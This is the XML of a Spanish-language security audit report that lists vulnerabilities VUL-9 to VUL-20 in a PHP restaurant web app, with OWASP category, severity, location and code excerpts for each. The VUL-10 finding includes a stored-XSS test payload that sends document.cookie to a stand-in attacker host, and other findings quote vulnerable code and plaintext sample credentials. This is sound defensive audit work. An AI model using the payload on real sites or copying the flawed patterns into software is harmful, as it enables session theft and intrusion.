      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="15778E5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783E56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A0463DA"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Tabla "usuarios" (Script_BD/pnk_security.sql, línea 170) y setup/procesalogin.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="54D78B2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69B977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A0E6222"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 xml:space="preserve">Las contraseñas se almacenan y comparan en texto plano, sin ningún mecanismo de hashing (bcrypt, Argon2 o </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
              </w:rPr>
              <w:t>password</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
              </w:rPr>
              <w:t>_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
              </w:rPr>
              <w:t>hash(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
              </w:rPr>
              <w:t>) de PHP). Ante cualquier fuga de la base de datos —incluso parcial, mediante los VUL-1 a VUL-8— todas las credenciales quedarían expuestas directamente.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="0E1FDDCC"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C01C74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B4701E1"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INSERT INTO `usuarios` VALUES (1,'Administrador</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>','admin@gmail.com</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>','admin01','1'),</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:br/>
              <w:t>(2,'Alondra</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>','alondra@gmail.com</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>','alondra01','1');</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="778C9267"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312A0EB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6D97B91"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0665725"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VUL-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245096" w:rsidRPr="00D21427" w14:paraId="3417F42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358462DF"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32D1C24E"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(Cross-Site Scripting almacenado)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="69346D16"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5FDDFB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77B889B"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ALTA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="69985F96"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B49C979"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8C2F0AF"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grcomentarios.php (entrada) e index.php, líneas 414-416 (salida — módulo de comentarios)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="298B92C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597DAA2"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lastRenderedPageBreak/>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DAB23DB"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 xml:space="preserve">Los campos "usuario" y "comentario" se almacenan sin sanitizar y se imprimen directamente en el HTML sin </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
              </w:rPr>
              <w:t>htmlspecialchars(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
              </w:rPr>
              <w:t>) ni ninguna codificación de salida, permitiendo inyectar código HTML/JavaScript que se ejecuta en el navegador de cualquier visitante.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="2DB0A47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A8BA141"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9B63234"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&lt;b&gt;&lt;?php echo $datoscomentarios['usuario'</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>];?</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>&gt;&lt;/b&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:br/>
              <w:t>&lt;?php echo $datoscomentarios['comentario'</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>];?</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:br/>
              <w:t>Payload de prueba: &lt;script&gt;</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>document.location</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>='//atacante.test/?c='+</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>document.cookie</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6CA2768B"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3362B620"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FAAA25E"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023AAF8"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VUL-11</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245096" w:rsidRPr="00D21427" w14:paraId="21D4B6A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6CF1AEC8"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0ECB2199"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A01:2021 – Broken Access Control (CSRF)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="4EF3CC7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86F4CB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0DE65C9"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ALTA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="01B02AA7"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9F832D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1C37018"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Formulario de login (index.php, acción setup/procesalogin.php)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="0DAC8D4C"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E610BA7"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C08EE58"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El formulario de inicio de sesión no incluye token anti-CSRF ni valida el origen de la solicitud, lo que en combinación con VUL-1 amplifica el riesgo de ataques dirigidos.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="3BAAD72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FB5629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C942DB8"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&lt;form class="form-inline" role="search" action="setup/procesalogin.php" method="post"&gt; ... &lt;/form&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:br/>
              <w:t>// sin campo hidden de tipo csrf_token</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="240C5E1D"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0A0D208C"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98356CE"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EA5CF44"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VUL-12</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245096" w:rsidRPr="00D21427" w14:paraId="21B7C8D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34A66138"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6DEC6A52"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A01:2021 – Broken Access Control (CSRF)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="043DE8F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2A0E674"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1B5BDC5"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ALTA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="4679107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61E05C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8D03473"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Formulario de comentarios (index.php, acción grcomentarios.php)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="4CB3198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D79ACA1"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FE05895"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El formulario de comentarios tampoco incluye token anti-CSRF, permitiendo que un atacante induzca a una víctima autenticada a publicar comentarios (incluyendo payloads XSS de VUL-10) sin su consentimiento.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="1342B7C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DE7423D"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BE4CABD"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&lt;form action="grcomentarios.php" method="post"&gt; ... &lt;/form&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:br/>
              <w:t>// sin campo hidden de tipo csrf_token</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="01916F11"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7BC85D6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35E98DF"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F1B779C"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VUL-13</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245096" w:rsidRPr="00D21427" w14:paraId="35E1FDD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50B35DE7"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0C2656F0"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A01:2021 – Broken Access Control (CSRF)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="42D6404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9D50ED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DA6CB69"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MEDIA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="642F4C8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06DBCE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CF528E8"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Operaciones del carrito vía AJAX (carrito.php, op=1/2/3)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="1C5AEA3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598E29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539901F"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Las llamadas AJAX que agregan, eliminan o vacían el carrito (js/controladorajax.js) no incluyen token anti-CSRF ni validan cabecera Origin/Referer, permitiendo su ejecución forzada desde un sitio de terceros.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="6A17008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6D87B4D"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9FF16B6"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proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>$.ajax({ type</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>: "POST", url: 'carrito.php', data: "op=1&amp;iditems="+id, ... });</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:br/>
              <w:t>// sin token CSRF en la solicitud</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0F7B6481"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0E76B6B5"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BCB643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4D019B3"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VUL-14</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245096" w:rsidRPr="00D21427" w14:paraId="2C83C6B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7B4BE696"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29DA0879"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A01:2021 – Broken Access Control (autorización solo en cliente)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="10327FE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66B8CF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70B8677"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ALTA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="0B52CB6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C61F112"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lastRenderedPageBreak/>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46A412A"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grcomentarios.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="7600673B"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2517AB9"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ADDB1F3"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grcomentarios.php inserta comentarios sin verificar en el servidor que exista una sesión autenticada válida ($_SESSION['nombre']). El formulario solo se oculta en la interfaz al usuario no autenticado, pero el endpoint puede invocarse directamente vía POST sin restricción alguna.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="16533AD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8853CDC"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A7C86FB"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include("setup/setup.php"); session_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>start(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:br/>
              <w:t>$sql="INSERT INTO comentarios SET usuario='</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>".$</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>_POST['usuario']."', ...";</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:br/>
              <w:t>// no existe validación de if(isset($_SESSION['nombre']))</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1204A35F"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1148636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6FC2A82"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2F7A381"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VUL-15</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245096" w:rsidRPr="00D21427" w14:paraId="192A21D5"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21196013"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65877897"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A01:2021 – Broken Access Control (IDOR)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="0D87F20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060AE37"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808328C"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ALTA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="1636EB6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35D2EED"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8DDF619"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index.php (líneas 7-8) y mostrar_carrito.php (línea 5) — parámetro "id"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="4EC42EFC"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3F0E152"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B00F502"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El identificador de restaurante recibido por GET se asigna directamente a $_SESSION['id'] y se utiliza en todas las consultas subsiguientes sin validar que el restaurante exista, esté activo o corresponda a un recurso al que el usuario deba tener acceso, permitiendo enumeración de recursos por simple incremento del parámetro.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="4DF14D8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74B4A8B"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E779DE5"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$key=$_GET['id'];</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:br/>
              <w:t>$_SESSION['id']=$_GET['id'];</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:br/>
              <w:t>// sin validar existencia/autorización del recurso solicitado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3D373CAF"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64195AE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B1FD1DB"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EC26E96"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VUL-16</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245096" w:rsidRPr="00D21427" w14:paraId="25AE541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3BC0B3F8"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6AC51472"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A01:2021 – Broken Access Control / A04:2021 – Insecure Design (lógica de negocio)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="0809A69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BDC1DB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66CD3E4"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MEDIA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="2E26E03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7548199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A0A7491"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 xml:space="preserve">carrito.php (línea 19, función </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>insertar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>))</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="15E001A6"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474ED1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4B81A91"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 xml:space="preserve">A diferencia de las consultas usadas para mostrar el menú en index.php, la consulta que agrega un ítem al carrito no filtra por </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
              </w:rPr>
              <w:t>items.visible</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
              </w:rPr>
              <w:t xml:space="preserve">=1 ni </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
              </w:rPr>
              <w:t>items.eliminado</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
              </w:rPr>
              <w:t xml:space="preserve"> IS NULL. Esto permite agregar al carrito productos ocultos, eliminados lógicamente o de otro restaurante, simplemente conociendo o iterando su ID, sin verificación de disponibilidad real.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="01101F0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DABF00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8243B9F"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$sql="select id, nombre, precio from items where id=</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>".$</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>_POST['iditems'];</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:br/>
              <w:t>// falta AND visible=1 AND eliminado IS NULL, presente en las consultas equivalentes de index.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="62820D7A"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2010567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24BF04B"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64E2C90"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VUL-17</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245096" w:rsidRPr="00D21427" w14:paraId="382C610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2DD12DDB"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4CD8E740"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A07:2021 – Identification and Authentication Failures (fijación de sesión)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="6B9EAD6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993677F"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6F622B7"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MEDIA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="1A4A208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17044D4"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B0D5A34"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setup/procesalogin.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="5CFD82A7"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8CFD31C"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7E2A5C0"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Tras una autenticación exitosa no se regenera el identificador de sesión (session_regenerate_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
              </w:rPr>
              <w:t>id(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
              </w:rPr>
              <w:t>)), quedando la aplicación expuesta a ataques de fijación de sesión (session fixation).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="1B19C0D6"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48A1A9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12A9EC5"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session_start();</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:br/>
              <w:t>$_SESSION['nombre']=$datos['nombre'];</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:br/>
              <w:t>// no se invoca session_regenerate_id(true) tras autenticar</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4607A058"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2B77FF1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D9F183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B703A43"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VUL-18</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245096" w:rsidRPr="00D21427" w14:paraId="003C42A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358224FE"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5CD205FA"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A07:2021 – Identification and Authentication Failures (fuerza bruta)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="271AD38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2D4E92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D01BF75"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MEDIA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="3ABF0CA4"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B30DA3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C2FA44E"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setup/procesalogin.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="42D1AB0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E54D44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760ACCB"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No existen mecanismos de bloqueo de cuenta, límite de intentos ni retardo progresivo ante intentos fallidos de inicio de sesión, lo que facilita ataques de fuerza bruta o diccionario sobre las credenciales de los usuarios.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="396AE680"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09B301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C90C88E"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 ningún contador de intentos, CAPTCHA ni retardo asociado al proceso de login</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5519858E"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180FF5E2"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F25763F"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B362AAC"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VUL-19</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245096" w:rsidRPr="00D21427" w14:paraId="02844426"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37589A12"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5D1B7C81"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A05:2021 – Security Misconfiguration (credenciales embebidas)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="228A91AB"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7370CC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5F1A66F"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MEDIA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="52ADC58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9032071"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800684A"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setup/setup.php (línea 5)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="4C56F1E3"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F7FECC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9AAE66F"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Las credenciales de conexión a la base de datos están embebidas en el código fuente (usuario "root" sin contraseña), en lugar de gestionarse mediante variables de entorno o un archivo de configuración externo al control de versiones.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="7FD9BCB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E8A68D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EE48546"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 xml:space="preserve">function </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>conectar(){</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">    $con=mysqli_connect("localhost","root","","pnk_security");</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">    return $con;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:br/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5F29ED6E"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36A687A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6868846"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226D42C"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VUL-20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245096" w:rsidRPr="00D21427" w14:paraId="0555F0FC"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2DAF128C"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30674885"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A03:2021 – Injection / Validación insuficiente de entradas</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="09B99E9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4D0A9EC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B7A3114"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MEDIA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="73043DD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3106B86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9DD8A01"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Todos los endpoints que reciben parámetros GET/POST (id, iditems, pos, op)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D21427" w:rsidRPr="00D21427" w14:paraId="31D9014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4C5A6D8"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D9E6D6F"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Ningún parámetro de entrada es validado en tipo o formato antes de usarse; por ejemplo, $_GET['id'] debería forzarse a entero con (int) o validarse con filter_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
              </w:rPr>
              <w:t>var(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
              </w:rPr>
              <w:t>) antes de emplearse en una consulta. Esta es la causa raíz transversal que habilita VUL-1 a VUL-8.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
